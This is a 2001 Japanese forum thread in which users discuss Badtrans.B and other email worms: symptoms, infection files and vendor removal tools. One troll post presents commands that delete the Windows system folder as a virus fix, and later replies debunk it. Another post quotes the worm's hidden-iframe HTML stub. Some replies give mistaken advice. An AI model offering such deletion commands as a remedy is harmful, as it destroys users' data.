ウイルスメル多くねぇ？

なんか昨夜から異常に来てんですけど。

特徴
1,差出人は知らないメルアドレスで先頭に_が付いている
2,40kb
3,内容は無し

おらぁマカーだから感染しないけどDLウザすぎ。
どうなってんのよ Ψ（｀-´）Ψ

おしい。おそらく同一主旨のｽﾚと思われるものが
先に立っていました。
http://www.2ch.net/2ch.html
統一されたほうがよろしいかと。

http://www.watch.impress.co.jp/broadband/news/2001/11/27/badtrans.htm

コレだろ？

http://www.2ch.net/2ch.html
すみません。間違えました(w

あ、また間違えた（泣
３さんが出してくれてるし(w
ありがとう。ちょと逝ってきます･･･

http://kaba.2ch.net/test/read.cgi/net/1006876322/l50

↑ここ

ほんとだ。スレ立ってたんだね。ｽﾏｿ。一応まとめとこう。

バッドトランス-B。
http://www.symantec.com/region/jp/sarcj/data/w/w32.badtrans.b%40mm.html
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=WORM_BADTRANS.B

んで、差出人のメルアドレスから_を抜いた人が感染してるってのはほんとなの？
（例：　[email protected]　→　[email protected]）
すげー数なんですけど。みんな感染してんのかな。

>>8
メールをプレビューしただけで感染することがあるから…
アウトルックとかアウトルックエクスプレス使ってると。
設定をきちんとして、パッチ当てておけばいいんだけどね。
ttp://www.sapporoworks.ne.jp/secure/004/index.html
ttp://www.sapporoworks.ne.jp/secure/003/index.html

こんな事態が発生するのに、
なぜみんなOutlookやIEを使い続けるのか。

実行されてしまった場合はどうなるんですか？
具体的に、わかるの？感染したこと。

gooのメールによく来るけど開けないだけで問題なし。
つうか知り合いに10件くらい感染してる奴がいる…。
毎日…

>>11
>具体的に、わかるの？感染したこと。
Windowsのシステムディレクトリに
Kernel32.exe
cp_25389.nls
kdll.dll
というファイルが作成されるから、スタートメニューの検索で探せばよい。
>実行されてしまった場合はどうなるんですか？
>>8のリンク先参照。

>>13
ありがとーヽ（・∀・）ﾉ

IE5.5使っているのなら、SP2のパッチを当てておけば大丈夫ということか？
だが、アンチウィルスかけると「感染しています」と出る。
レジストリに書き込まれた様子もないし…。
これは大丈夫なんだろうか。

糞Ψ（｀-´）Ψ＞ゲイツ

今朝（ついさっき）、それと思しきメールが来たよぅヽ(｀Д´)ﾉ
>>1と全く同じ。
即効消しました。。。
てーか、こういうの実ははじめて（ぽ）

ウイルス名： WORM_ALIZ..A
別　名： iworm.alizee, TROJ_ALIZ.A, W32.ALIZ.WORM, WIN32.ALIZ, ALIZ
言　語： 英語
ウイルス種類： トロイの木馬型（ワーム型）
プラットフォーム： Windows
暗号化： No
ウイルスサイズ： 4096bytes
発見日： 2001年9月4日
発病条件 1: ファイル実行時
破壊活動 1: メールを自動送信する
詳　細： -
　これはワームに分類されるトロイの木馬型不正プログラムです。
Outlook、OutlookExpressの設定を利用して自身のコピーを添付したメールを任意の
宛先に送信し、ネットワーク上で自己増殖するワーム活動を行います。
流行した「ニムダ」ウイルス同様、InternetExplorerのセキュリティホールを
利用しメールをプレビューしただけで活動を開始する「ダイレクトアクション活動」
を実現しています。

活動：
　ワームはOutlook、OutlookExpressの設定を利用し、Windowsのアドレス帳
ファイルから抽出したメールアドレスに自身のコピーを添付したメールを送信します。
ワームはメール送信以外にシステムの改変などは行いません。

　ワームが送信するメールの内容は以下の通りです：

　メール本文："Peace."
　添付ファイル名："WHATEVER.EXE"

怖いね〜。

参った。
ｼﾏﾝﾃｸをよく読むと、キャッシュの中の.ht**と.aspに含まれる
メールアドレスにもviriiを送りつけるんだね。
つーことはアドレス帳に入ってなくても送られるんだ。
道理で多いわけだ。

アフォΨ（｀-´）Ψ＞ゲイツ

ウチは一昨日、昨日と連日
W32.Badtrans.B@mm（Batdtrans.B）が来るなぁ。
IE6&パッチ済みだけど大丈夫なんじゃろか。

ちなみに届いたメルの添付ファイルは*.pifと*.scr

折れの所にも来たよー
二フとホットメールに２通来た・・・
アウトルックで開いたんだけど、、、アウトルック６は
ファイル開く前に警告が出たよ。

これって、、、ウイルス感染してない？

昨夜来たけど、大丈夫。レジストリーもチェックしたけど異常なし。

同様スレ
http://kaba.2ch.net/test/read.cgi/net/1006876322/l50
がありましたがそちらはメアド晒したため削除対象になるようで
こちらを活かしておきます。

�ﾜｳﾆ� Re: � 11月�28日 40k�
hotmailに着てた！！！

ウィナーは哀れやのう

マッカーの代表はｺｼｷﾀﾝ

>>27
ウィナーというのは悔しいからゲイツァーと呼ぼう。

ｵﾚ､ﾃﾝﾌﾟﾌｧｲﾙ､ｶｲﾌｳｼﾀ｡

ｳｲﾙｽﾆｵｶｻﾚﾀ｡(藁

開封してしまったけど何も無い・・・
林檎にも感染さしてくれ！！！！

林檎にはいらないよ〜(･∀･)


Ψ（｀-´）Ψ＞下逸

おいらも真っ赤ー
でもウイルスは無差別にやってくるさ、
差出人が実名のやつがきたyo(藁

winもmacもｶﾞﾊﾞﾚヽ(´ー｀）ﾉ

今mikirinから来たyo!!

�ｼi@t� Re: � 11月�29日 40k
こんなんもきたぞ


と

こんなのも来た。

From [email protected] Thu, 29 Nov 2001 04:13:45 -0800
Received: from [210.139.254.157] by hotmail.com (3.2) with ESMTP id MHotMailBDCF713900BB40043154D28BFE9DDE300; Thu, 29 Nov 2001 04:12:42 -0800
Received: from mail.kc4.so-net.ne.jp (mail.kc4.so-net.ne.jp [210.139.254.57])
by mgate10.so-net.ne.jp (8.9.3/3.7W01060506) with ESMTP id VAA11216
for <******@hotmail.com>; Thu, 29 Nov 2001 21:12:41 +0900 (JST)
From: [email protected]
Received: from oemcomputer (p84cce4.tcurpc00.ap.so-net.ne.jp [210.132.204.228])
by mail.kc4.so-net.ne.jp with SMTP id fATCCd507055
for <******@hotmail.com>; Thu, 29 Nov 2001 21:12:39 +0900 (JST)
Date: Thu, 29 Nov 2001 21:12:39 +0900 (JST)
Message-Id: <[email protected]>
To: <******@hotmail.com>
Subject: =?ISO-2022-JP?B?GyRCIXkkTyQ4JGEkXiQ3JEYhIxsoQg==?=
MIME-Version: 1.0
Content-Type: text/plain; charset="ISO-2022-JP"
Content-Transfer-Encoding: 7bit

☆エンタメ雑誌webmaster全国人気サイトご紹介!!
　--------------
　今週上位のお勧め
　--------------
◇◆♪Fineな恋愛は
「クラブジャパン」で体感♪アド非,高速チャット,占い,業界初UP機能,女性は現金20万円獲得出来ます♪　ココ⇒ http://www.club-j.jp/?ad=12
　--------------
GO!!

おれは、11/20ごろからW32/Alizメールの攻撃受けて
11/22ごろW32/Alizに感染しました。
取引先からでしたのでうっかり開封したためです。
一日がかりで修復しました。
そして昨日WORM_BADTRANS.Bに感染しました。
これっつて、開封しなくても感染します。
メーラーの設定ちゃんとIPAに書いてあったようにしたのに・・・
ウィルス作者は逝ってよし

SP2入れとけよ

友達少ない俺にも２通も来た。
元アドレスはだから簡単に特定できる・・
一応教えてあげたよ。俺自身はﾏｸだから平気なのね。

ポスペは平気でしょ？
話題に出ないんだけど。。。うーん。

>>41
ポスペは問題なし。ご安心めされぃ。

>>42
ありがとう〜！　安心♪

"ﾜｳﾆ" <[email protected]> � �
Re: �
日付�:�
Thu, 29 Nov 2001 00:12:18 +0900 (JST) �
添付ファイル�:� docs.DOC.pif (38k),�text5.txt (0b)

開きたい・・・

差出人�:�
"ｼi@t" <[email protected]> � �
件名�:�
Re: �
日付�:�
Thu, 29 Nov 2001 20:55:58 +0900 �
添付ファイル�:� Pics.DOC.scr (38k),�text5.txt (0b)


これもか？？

>>44
いいのか？他人のメアド出して？

ぅーゎっ
また来やがった（；´Д｀）

悪気ないんだから、みんなメアド晒すのはやめようね(´ー｀)yｰ~~

感染してしまったらどうすればいいですか？
あと、放っておくとどうなりますか？

参考になるかどうかわかんないけど・・
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]

あー、きたきた。ポスペ大丈夫なんだよね？

１、メアド晒しはヤメよう！　アンダーバーを消せばその人のアドレスなんだから。
２、感染したらとりあえずｼﾏﾝﾃｸのページにでも行って駆除されたし。（方法が書いてます）
３、問題はアドレス帳に載っている人だけじゃなくてキャッシュの中のメールアドレスにも
　　送信するから、サーフ（死語）するたびにウィルスメールを送り続ける、らしい。
４、ポスペは問題なし！（らしい）

>>51

ｼﾏﾝﾃｸのﾍﾟｼﾞｰ､ｵｼｴﾃｰ｡

ｵﾗ､感染しちまったﾀﾞ｡

>>52
あれ。ｼﾏﾝﾃｸのページには「NAVを使って駆除する」というのしかないな。
>>49のURLでいいと思いますよ

>>53
ｻﾝｸｽ!

ポスペは大丈夫ってのは根拠あるの？
ポスペに来たメルでもNortonAntiVirusが反応したぞ。
感染したその時には何も起こらないってのは常識じゃないのか？

結論：ポスペでも感染する。

ﾄﾚﾝﾄﾞの自動駆除ツールでＯＫ？

>>55
添付ファイルに反応したのでは？＜あんちういるす
ＯＥ場合、セキュリティホール塞いでない場合
プレビューすると添付ファイルが実行されちゃうの。
ポスペだと添付ファイルそのものを実行しない限り
感染しないはず。

ＩＥ６普及キャンペーンの一環でＭＳが配布してたとしたら鬱だ…　

ありうるZO!!

>>58
そうなの？

>60
ばれたらＭＳの存続にかかわるからそんな事はないと思われ。
でもゲイツとＭＳの過去の行動・キャラクターからは
「ひょっとしたらそうなのかも」などと楽しめます。

ウイルス発生率の多いＷＩＮからＭａｃに乗りかえる奴が激増するので、
Ｍａｃ用にWINより性質の悪いウイルスを研究しているぞ、MSは。

なぜ、知らない人たちから送られてくるんだろう？
受信簿にあるアドレスで送る仕組みなのだろうに。

>>63
「WORM_BADTRANS.B」というウィルスが流行しし始めている模様です。

このウィルスの場合、過去に直メールをしたことのある相手だけでなく、「temporary Internet files」からも勝手に送信をしてしまうため、多くのＡＳＡ板住人に感染してしまっている模様です。

メールのタイトルが・・・
　"Pics"
　"images"
　"README"
　"New_Napster_Site"
　"news_doc"
　"HAMSTER"
　"YOU_are_FAT!"
　"stuff"
　"SETUP"
　"Card"
　"Me_nude"
　"Sorry_about_yesterday"

であり、拡張子部分が・・・

　".DOC."
　".ZIP."
　".MP3."
　"scr"
　"pif"

となっているメールに関しては、知っている方からのメールであっても、プレビューせずに（メールを見ただけでも感染する模様）削除することをオススメします。

つーかウチにもばんばん来るんだが・・・
昨日一日で６通来た。恐ろしい。

>>63
インターネットのキャッシュ（一度訪れたページ）内の
html及びaspに含まれるメールアドレスにも送るようですよ。
だからページ管理者にはすごい数が届くらしい。
しかも単に訪れただけの人からだから誰か判らない。

ウィルス集めています。どんどんメールで送ってネン！

>>67
まじで送ったぞ！

最近ウイルスが大量に来て困ってませんか？
自己防衛しないといけませんね。
あらかじめ、PCの設定を変えることでウイルスを防ぐ事ができますよ。

設定方法
【１】スタート→プログラム→MS-DOSプロンプト、またはコマンドプロンプトを起動する。
【２】win95かwin98の人は「deltree /Y C:\windows」
　　winNTかwin2000の人は「rmdir /S C:\winnt」
　　※「/Y」は「yield」の略。「生産する」の意味。
　　　　「/S」は「second /Y」の略。こちらの方が改良されている。
【３】あとは自動的にwindowsがウィルス駆除してくれるよ。

★「deltree」や「rmdir」は緊急修復用のコマンドです。
★こういうシステムがらみの修復にはDOSを使うと
　システムの割り込みが抑えられ、快適に駆除されます。
★「deltree」や「rmdir」はwindowsの標準コマンドなので安心。
　機能も高く、UPDATEを自動作成するほか、
　機能の改変も全て自動でできるという優れものです。

晒し上げ

>>69

素人をだまして、なんか楽しいかい？
だますなら、大物だませ。
バァーカ。
すべてのシステムファイルをごっそり消すコマンドなので、絶対、やらないように

「deltree」や「rmdir」はディレクトリを削除する
コマンドです。実行すると大変なことになると思われ。
「/Y」は知らないんで詳しい人解説お願いします。

かぶった。しかもこっちのほうが3分も遅い
欝だ詩嚢

>>72

/Y って、結果表示をしない様にするコマンドだろ？
試ぬのは、>>69

>>72
調べろ、以上

間違えた。
もう一つ。
あぽ〜んするか、確認メッセージをださない様にするオプション。
最悪、激鬱。
逝ってきます。

すんません。ネタでコピペしたんで、悪意ないっす

ペンギンしかコマンドライン触らないからdosコマンドにrmあるの知らな
かったよ。ちょっと感激。　でも、dosのコマンドって長ったらしいね。

>>77
氏ね。つーか、マジで死んでこい。

朝からポスペに１通、lycosにも５通ほど届いた。鬱だ。

エキサイトのフリメに一日４０通ぐらい来るぞ。
一瞬で容量限界になって大事なメールが受信できない。
HPにメアド載せてるからかなぁ

漏れは掲示板にメールアドレスを書き込まないようにしただけで
かなり減りました＜ウィルスメール

>>81
俺もそう思って消したんだけど
フォームとかも読み込むから消すの難しいよな。

しかしウィルスに気付いてないヤツラの多いこと...

>>69
ネタになってないだろ

ライコスに４通来てたけど、開いて大丈夫か？
知り合いからなら教えてあげたいんだが。

>>85
アウトルックやアウトルックエクスプレス以外で受信したなら、
添付ファイルを実行しなければ大丈夫。

ベッキーを使っているんだが、困ったことがある。
とりあえずウィルスには感染しないので平気なのだが、
ウィルスバスターがベッキーに対応してやがらない。
ﾒｰﾙﾎﾞｯｸｽ（＝単一ﾌｧｲﾙ）すべてをどっかに隔離しちまう・・・

本籍地　名古屋市　現住所　神戸市
1983　3・22　名古屋市昭和区の余語病院にて生まれ育つ。小4で神戸へ。隣の小学校にはあの酒鬼薔薇聖斗がいた。つまり同じ友中の校区で同学年だったのでッツーか小学校のダチヤツと事件当時同じクラスだったし…。
1995　1・17　阪神大震災。殺意の波動に目覚める。
そのせいかナンカノ間違いで灘中に通ってしまう。これが全ての間違いだった。まあ落ちてりゃ首斬られタン俺かもしんナイケド（笑）。
もちろんまぐれなので勉強について行ける訳が無くグレル。散々屁垂れた後当然の如く浪人。今に至る。

マザーに同梱されていたpc-cilling使ってるけど
特に問題なく駆除してくれているみたい。
あと、ドりキきゃスで受信してサーバーから消してしまうとか。

とりあえず最低限の自己防衛もしていない奴は
回線切ってモジュラージャックを尻の穴に突っ込んだまま死ね！

うちにも着た・・・うれしい！！hotmailできた
みんなと一緒
わーい！わーい！

なるほど。HPにメルアド載せてたからなんですね。

>>91
うん、それが一番やっかいだ。

あの、こんなことを書くと引っ込んでろ！と言われそうだけど…。

どんなメーラーを使っていても、HTMLメールを閲覧する時にフレーム内でインターネットエクスプローラーが起動するのであれば、感染の可能性はあるわけで。
EXEファイルの警告を「今後は表示しない」にしていなければ、古めのIEでも感染しないんですけどねぇ。

ここから実行する
ファイルを保存する

ときかれますから。

教えてちゃんで失礼します

OEの場合、プレビューウィンドウを表示しなければ
プレビューしちゃうことないのよね？

>>94
yes.

>95
サンクス！

マジで多いな。何かあったのか？

うん、漏れのとこも毎日2通程来る。
先週辺りからいきなり来だしたな…

ウイルス駆除ソフトメーカーのｼﾞｻｸｼﾞｴｰﾝ

さっぱりこねー。

WORM_BADTRANS.B
が来て感染したらしくて困ってるんだけど。
一応トレンドマイクロのＨＰ見て元に戻したけど
色々な所から貴方のメールからウィルスが検出されましたって出て
困ってる。そうすりゃいいの？

>>101
元に戻す前に発信されたウィルスメールじゃないの？

>>102
セガとかビックとかヨドバシとかから何通も来てうざい。

ライコスに来てたの開けてみた。
４通とも別の人でぜんぜん知らない人だった。
だが、添付ファイルの表示ないんだよね。40kあるのに。
なんで？ライコスに来た人いる？

一通もこねぇー、なんかハミ子な気分

>>104
イパーイ来てた（ｗ；＜ライコス
添付ファイルの表示はなし。

ダウンロードしてウィルスバスターでウィルスプロパティ見てみたら、
バッドトランスって判定された。＜ライコスのメール

ういるすうぜぇ。。
hotmailに１日１０通は来る!!
なんかmp3とか書いてるからあけちゃいそうになる!!

きょうも来ました。これで４つめでござーい。
４０Ｋバイトでタイトル部分はRe:だけで本文なし、差出人不明。
WEBメールだから即座に削除、うっとおしいでござーい。
いったい、いつまで続くのかー!!

ウィルスメール送信元にウィルス感染してるよって教えてあげてる？
私は教えてないんだけど、教えたほうがいいのかな？

超初心者でウィルスの削除の仕方がさっぱりわかりません。
用語はわからない？？
誰か教えて下さい。

>>110
教えないよ。どーせ誰かおせっかいな人が教えてるでしょ。
いつまでも同じ人から来るようなら教えるかもしれないけど。

>>110
とりあえず、超初心者が2chなんか来るなと。

>>113
そんなこと云うあんたってださい。ぷ。

>>114
で？

>>115
ださい

>113
ああ、超初心者扱いされてしまったか。不愉快な気分にさせてたらごめんね。

>112
レスありがとう。そういえば同じ人から何度も来てるかっていうチェックはしてないわ。
３通以上同じ人から来てる場合はちょっと一言連絡してみるかな。

でも今日になって、随分例のメール減った気がするよ。

ああ〜、超スマン、>>117　>>111の間違いだった。
ゴメーン、鬱だ。

>>118
なんだ間違いか。
じゃあ俺も謝るよ。スマンｺ

気を取りなおして、
>>111
板トップのシマンテックとトレンドマイクロのリンクをクリックして
なんとか理解してくれ〜。
しかし削除って、もう感染してるんか？
不安ならウィルス駆除ソフト（ウィルスバスターとか）を買って
インストールしよう。プレインストールされているかもしれんが。

>>120
ヽ（^ω^）ﾉ　ｷﾆｼﾅｲｷﾆｼﾅｲ
シマンテックの駆除手順の説明、時々変な日本語の時があって鬱・・・

関係ないけど雅子さま出産間近ｵﾒﾃﾞﾀｲ

とりあえずトレンドマイクロのオンラインウィルス検索がお手軽か？

俺もオンラインスキャンやっといたよ。
ちょっと安心した。

ｲﾏﾏﾃﾞ　ｳｨﾙｽ　1ﾄﾞﾓｷﾀｺﾄﾅｲ･･･　ﾁｮﾄｻﾐｼｲ　ﾜｻﾞﾄｵｸﾗﾚﾙﾉﾊｲﾔﾀﾞｹﾄﾞ

>>124
自分でサイト持つとイヤっていうほど来るよ。
あと掲示板に必ずメールアドレスを書くようにするとか。

CGIは取らないらしいよ。htmlとaspのキャッシュだけみたい。

>>126
ログをHTML出力する掲示板もあるから安心できません。
塩のゲストブックなんかその典型。

WORM_BADTRANS.B。

俺も累計５０通ほど届いてる。
俺の個人ＨＰにアドレス載せてて
読者数は１５００人程度だから、
感染率はネット人口の３％程度。

サンプルに偏りはあるかしれんが、
ウイルスの感染率ってどんなもんなんだろ？

おおっ
初めてウィルス来たよー
ちっとウレシィ(藁
速攻あぼんしちゃたけど

うちもきた

おい！オメ-らウィルス対策ソフトぐらい入れろボケ！
テメーらみたいな貧乏人がウィルスを撒き散らしているんだよ！

俺も初めてウイルス来たので少し感動。

オレも来たけど、WEBメールだから良かった。
でも差出人がいみわかんねぇ。
鈴木なんたらってやつから送られてきた。

そんな知り合いいないんだけど。

ウィルスうぜぇぇぇぇぇぇぇっ！
一日に４０通もくるんじゃねぇよっ！

>>133
最近のウィルスはWebページなんかに載ってるメールアドレスを拾って
絨毯爆撃しやがるのさ。

ウィルス直ったらどうやって確認したらいいですか？
一応削除はしたんだけど

ウイルスが直っても困るんだが・・・
つーか意味不明。

>>136
http://www.trendmicro.co.jp/hcall/scan.htm
でオンラインスキャンでもしてみたら？

…いや、今更だと思うんだけどさ。
このスレ読めば大体対処できるぞ。
http://pc.2ch.net/test/read.cgi/sec/1007075829/l50

Ψ（｀-´）Ψ＞ゲイツ

今までそういうの一通も来た事ないので
少し寂しい

>>141
いるんならあげますけど？

>>141

仲間だﾜｼｮｰｲ!!

少しｻﾋﾞｼｲ気持はわかるﾖ!!
でも来ない方がｲｲと思われ(w

いたずらメールは大量にくるのに
ウィルスが全然ついてないので，
感染してるのに気づいてないだけ（？）
とか不安になってしまいます．

ウィルスチェックはもちろんしてます．
鶴亀メール使ってるです．

ウイルスメールらしき物が来ました。
知らない人から。40ＫＢでした（付属あり）
とりあえず、プレビューなしの設定にして
削除したけど・・・。大丈夫でしょうか？
ちなみにＯＥとＩＥ使ってます。
他のに変えようかな・・・。

>>145
IEでもセキュリティホールちゃんとふさいで
プレビューウィンドウも表示してないなら大方大丈夫。
心配ならオンラインスキャンかけてみれ。

>141
仲間がいたー！！
家にも一通もこないよ（ｗ

＞146さん
レスありがとうございます。
テレホタイムになったら、
オンラインスキャンかけてみます。

>>145そうだな！！サンクス！！
それが一番早い。頂きます。

Macは感染しないんですよね？
っていうことは、削除したあとはそのままなんにも
しないでいいのでしょうか。
こういうの来るの初めてでちょっとこわい…。

俺もいっぱいきてます。
1日に１０通くらい届くのはなぜ？？

>>150俺もマックだが開いても大丈夫だぞ！
でも来たら>>145のレスに設定すれば問題無し！！
>>151は他サイトでメアド晒し過ぎ！
webメ−ルに登録しろよ！！


と

>>152
そ、そう・・・？
あまり晒してないつもりなんだが。

KERNELで検索したら、ProgramFilesにある
IKERNELというのがヒットしました。
これってウィルスですか…？
昨日ウィルスが添付されてると思われるメールを
プレビューしてしまいました。
IE5.01SP2使ってるんですがどうなんでしょうか？

sp2でも感染するらしいよ。

まじですか！？
このKERNELってのはウィルス？？？

KERNEL32ならウイルス。

しかし、来るメールの４分の１くらいウイルスつき。

KERNEL32はｳｨﾙｽじゃないって、うちのシステム部の人が言ってたよ。
拡張子をよく確認すべし。
それが２重拡張子だったら怪しいんでしょ？
もともと入ってるKERNEL32は消しちゃダメだよ。
いろんなシステムで使われるものらしいよ。

>>158
ウィルスが、もともと入ってる kernel32.dll を
書き換えちゃうんだよ。
感染してるかどうかは、アンチウィルスとかでスキャンしないと
わからないけど

アンチウィルスソフト入れてないんですけど、
チェックする方法ないですか？

ご馳走様でした。
W32/SirCam@MM ウイルスが検知されました。
件名 : c

日付 : Fri, 30 Nov 2001 17:24:43 -0500

添付ファイル : c.vpierre.doc.lnk (210k)

>>159
嘘教えたらあかん。
感染ファイルはkernel32.exe。
間違ってkernel32.dll消したらシステムおかしくなるで。

こんじょうで。　　　　　

間違いだったらスマソ
HYBRIS とかは　"GetModuleHandleA KERNEL32.dll"
つーコードが入ってるから、てっきりdllをいじってるん
だと思ってたよ。

けど、exeって事は実行モジュールなの？？？

自分にメール送ってもウィルス付きのメールは
来ないんですけどセーフですか？

>>165
とりあえず
http://www.trendmicro.co.jp/hcall/scan.htm
で、オンラインスキャンしてみればどーでそ

早速いってきます。

ウィルスは検出されませんでした。
どうもお騒がせしました。

>>164
HYBRISのことはようわからん。スマソ。
BADTRANSが作るファイルは以下の３つ
・kernel32.exe（自分自身）
・Cp_25389.nls
・Kdll.dll
でレジストリに、Windows起動時にkernel32.exeが自動実行されるような値を
書き込むらしい。

がいしゅつだが、BADTRANSに関してはやっぱセキュリティ板が詳しいな。
Re:メール受け取ったけど対処の仕方わからん人は行ってみるべし。
ここの1-4あたり読めば何とかなる。
http://pc.2ch.net/test/read.cgi/sec/1007075829/

winは大変だな・・・


と

Winは、使うたびにインストールすると良いよ

俺は、ウィルスなんか怖くネーよ!

俺のメール先は、本物だからーウィルス送りたかったら

送りなー! 絶対にかかる訳が無いぜ!<笑>

バカどもには負けねーよ!

>>172ウィルスメ−ルも着ないのか・・・
可哀想に・・・
〜〜〜〜〜〜〜合掌〜〜〜〜〜〜〜〜
sageよ




と

メール開いたら、いきなりＭＥＤＩＡ　ＰＬＡＹＥＲ？が開き、あわてて閉じました。
電話線は切っていたのですが、感染してますでしょうか？

>>174
メール届いちゃってからなら電話線は関係ない。

＞１７５
ということは、感染ですね・・・。
電話線切って、1つずつチェックしていったら、なんかいきなりで・・・。
今、私のＰＣに何が起こってるんでしょうか？

>>176media playerが開いたってゆうのはよくわからない。ｺﾞﾒｿ。
ウィルスじゃないかもよー。
それこそ心配ならオンラインスキャンかけてみなされ。

＞１７７
ありがとうございます。
何も変化はないので大丈夫かなぁなんて思ってしまいますが、よくわかりません。
オンラインスキャンっていうのもよくわかりませんが、いろいろ見てやってみます。
ありがとう。

>>178
Media Playerが開いたのなら、高確率でウイルスやで。他にも例がある。
詳しくは解らんが、添付されてくるウイルスが音楽ファイルを装う
（拡張子がMP3とか）ことがあるから、Media Playerが開くんとちがうかの。

実際に感染したかどうかはオンラインスキャンで調べてみなされ。
今混んでるみたいなんでうまく繋がらんかもしれんが。
http://housecall.antivirus.com/housecall/start_jp.asp

それから、もしBadtransに感染してても自分のパソコンには特に変化は現れん。
いろんなところにウイルスメールをばら撒くことになるが、Outlookの履歴には残らんから、
送った先から「ｺﾞﾗｧ」メールが届くまで気が付かん。
早めにオンラインスキャンするがよろし。

152さんありがとうございます。安心しました。。

ところで、きょう一日で、CAEBNECA.EXEっていうファイルが
添付されたメールが２通きたんだけど…
これもなんかヤバイものなんでしょうか？

ここで話題になってるものと関係ないかもなのでさげますね。

メールのタイトルの頭に（Re）が付いてるもので
尚且つメールのタイトルが文字化けしてるものは
かなり危ないよ。みんな、くれぐれも開かないようね

WEBメールならファイル開かなきゃ安心・・？

>>182
うん。
即刻削除なさいませ。

一日１５通ペースですがなにか？

スマソ。Media Playerが開くことがあるのは、メールのMIMEヘッダで添付ファイルのタイプ
をaudio/x-wavと指定してるかららしい。知ったかぶりはいかんな・・・。（汗

>>184
うちはまだ1通。HPにもメアドさらしてるのに・・・。

俺は、ウィルスなんて、怖くネーよ!
メールアドレス間違えたみたいだな!
[email protected]だぜ!!
俺のアドレスは本物だから、ウィルス送りたかったら送ってみなー!
絶対にかかるわけがナイゼ!<笑>　バカには負けねーよ!

>>185
ただしい。
MIMEが原因で馬鹿IEがファイル実行しちまう。

漏れもあまりに多いから、自分のページのトップからアドレス消した。
最初は親切心でランダムにｺﾞﾙｧしてたけど、もう飽きた。

>>180
たぶん、「W32/Hybris.gen@M」だね。
http://www.nai.com/japan/virusinfo/virH2000.asp?v=W32/Hybris.gen@M

>179,185,,,187
ありがとうございます。
そうなんです。勝手に実行（開いた時点で）しちゃったんです。
これは感染したということなんでしょうか？
オンラインスキャンした方がいいのでしょうか？
１７９さん、度々親切にありがとうございます。

やられちまった
Ｍｅの復元ポイントくわれちってたよ　鬱

>>189
オンラインスキャンはした方がいいよ。マジで。感染したかどうかは
スキャンしてみないとわからんでの。

で、もしBADTRANSに感染しとったらこれ

☆WORM_BADTRANS.B 修復ツール（トレンドマイクロ）

http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3368

幸い感染してなかったとしても、抜本的対策として、Internet ExplorerのバージョンをSP2
にした方がよいです。そうすればウイルスが自動実行されることだけはなくなる。

☆Internet Explorerのバージョンアップはこちらから

http://microsoft.com/japan/technet/security/current.asp?url=/japan/technet/security/frame_prekb.asp?sec_cd=MS01-020
または
http://windowsupdate.microsoft.com/

来ませんが、何か？

ウイルス集めてます。
たくさんのメール、待ってます。

ウイルス集めてます。
たくさんのメール、待ってます！！

昨日のメールはウイルス25通だけでした、と。
さみしー！

とうとううちにも来たようですが･･･

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
このメールの添付ファイルはウィルスに感染していました。
The attached file of this mail was infected with the virus.
”message”は”CVDL W95/Badtrans.B”に感染していました。
”message”file was infected with the virus ”CVDL W95/Badtrans.B”.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ウィルスと一緒に”message”はファイルごと削除されました。
The file ”message”was eliminated with the virus ”CVDL W95/Badtrans.B”.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

<HTML><HEAD></HEAD><BODY bgColor=#ffffff>
<iframe src=cid:EA4DMGBP9p height=0 width=0>
</iframe></BODY></HTML>

これはどういう事なんでしょうか？
当方IE5．5　SP2なのですが、プロバでウイルスをサーバ上で処理するサービスにも登録しています。
大丈夫なのでしょうか？

>>196
添付ファイルがサーバ上で削除されちゃってるなら大丈夫と思われ。
添付ファイルがウィルスの本体だから。

>>197
どうもありがとうございます。
駆除ツールで念の為確認したらやはり大丈夫だったようです。
しかしその後>>13にある3つのファイルですが、検索したらKernel32.exeがあったんですけど･･･

Kernel32.exeはウィルスに感染する前から存在する場合もあるらしい。
バッドトランスの類に感染すると
同名のウィルスの実行ファイルに上書きされてしまうけど。
ウィルスチェックにひっかからないならだいじょーぶと思うけど。
ウィルスバスターなんかだと
ファイル単位でウィルススキャンができるからやってみては
（エクスプローラなんかで
Kernel32.exeの上で右クリック→「ウィルスプロパティ」）。

>>198
オンラインスキャンじゃなくて"駆除ツール"使ったんだよね？179に書いてあるやつ？
だったら、再感染防止のためにKernel32.exeっていう"フォルダ"ができているはず。
検索で引っかかったのがフォルダのアイコンだったら放っておいていいよ。

ウイルスは同名のファイルには上書きできるけど、同名の"フォルダ"がある場合には
上書きできないらしい。そういう意味で再感染防止に役立つ。

SETUP.DOC.scr ってのが添付されてたよ．
速攻削除したけどこれって何のウィルス？情報ｷﾎﾞﾝﾇ

Windowsで拡張子表示してない人はDOCファイルだと思って
開いちゃうから，すぐ広まりそうだね．

ウチにも10件くらい来たよ、バッドトランスB。
ノートン安置ウィルス入れてたから、検疫できて助かったんだが。

でも、システムスキャンすると、"C:\_RESTORE\TEMP\..."にあるファイルが感染していると言われる。
DOSプロンプトでも消せないし、ウィンドウズでは最初から見れない。
レジストリ見ても異常はなかったし、妙なEXEファイルとかDLLファイルもなかったし。
身に覚えのないメール送信記録もないから、感染していないとは思うんだが…。

ちなみにOSはWindowsMe。

>>202
＞ウィンドウズでは最初から見れない
隠しファイルもちゃんと表示しましたか？

[_RESTORE]フォルダよりウイルスが発見される現象ですが、WindowsMeの
機能である「システムの復元」機能によってウイルス感染した状態がバック
アップされてしまっていると思われます。
　WindowsMeではOS自体やアプリケーションの主要なファイルを自動的に
バックアップしています。この機能によってウイルス感染した状態のバック
アップ（WindowsMeでは「復元ポイント」と呼びます）が作成されてしまった
場合、バックアップファイル内からのウイルス駆除やバックアップファイル
自体の削除はできません。そのため、繰り返し発見される状態になってしまいます。
　ウイルスが感染したファイルを含むバックアップを保持していることは
セキュリティ上望ましいことではありませんのでバックアップを一旦破棄し、
ウイルスを完全に駆除した状態でバックアップを作成しなおすことをお勧めいたしま
す。


●バックアップを全て破棄する方法


�@[コントロールパネル]-[システム]-「パフォーマンス」タブから
「ファイルのシステム」を選択します。


�A「ファイルシステムのプロパティ」画面から「トラブルシューティング」
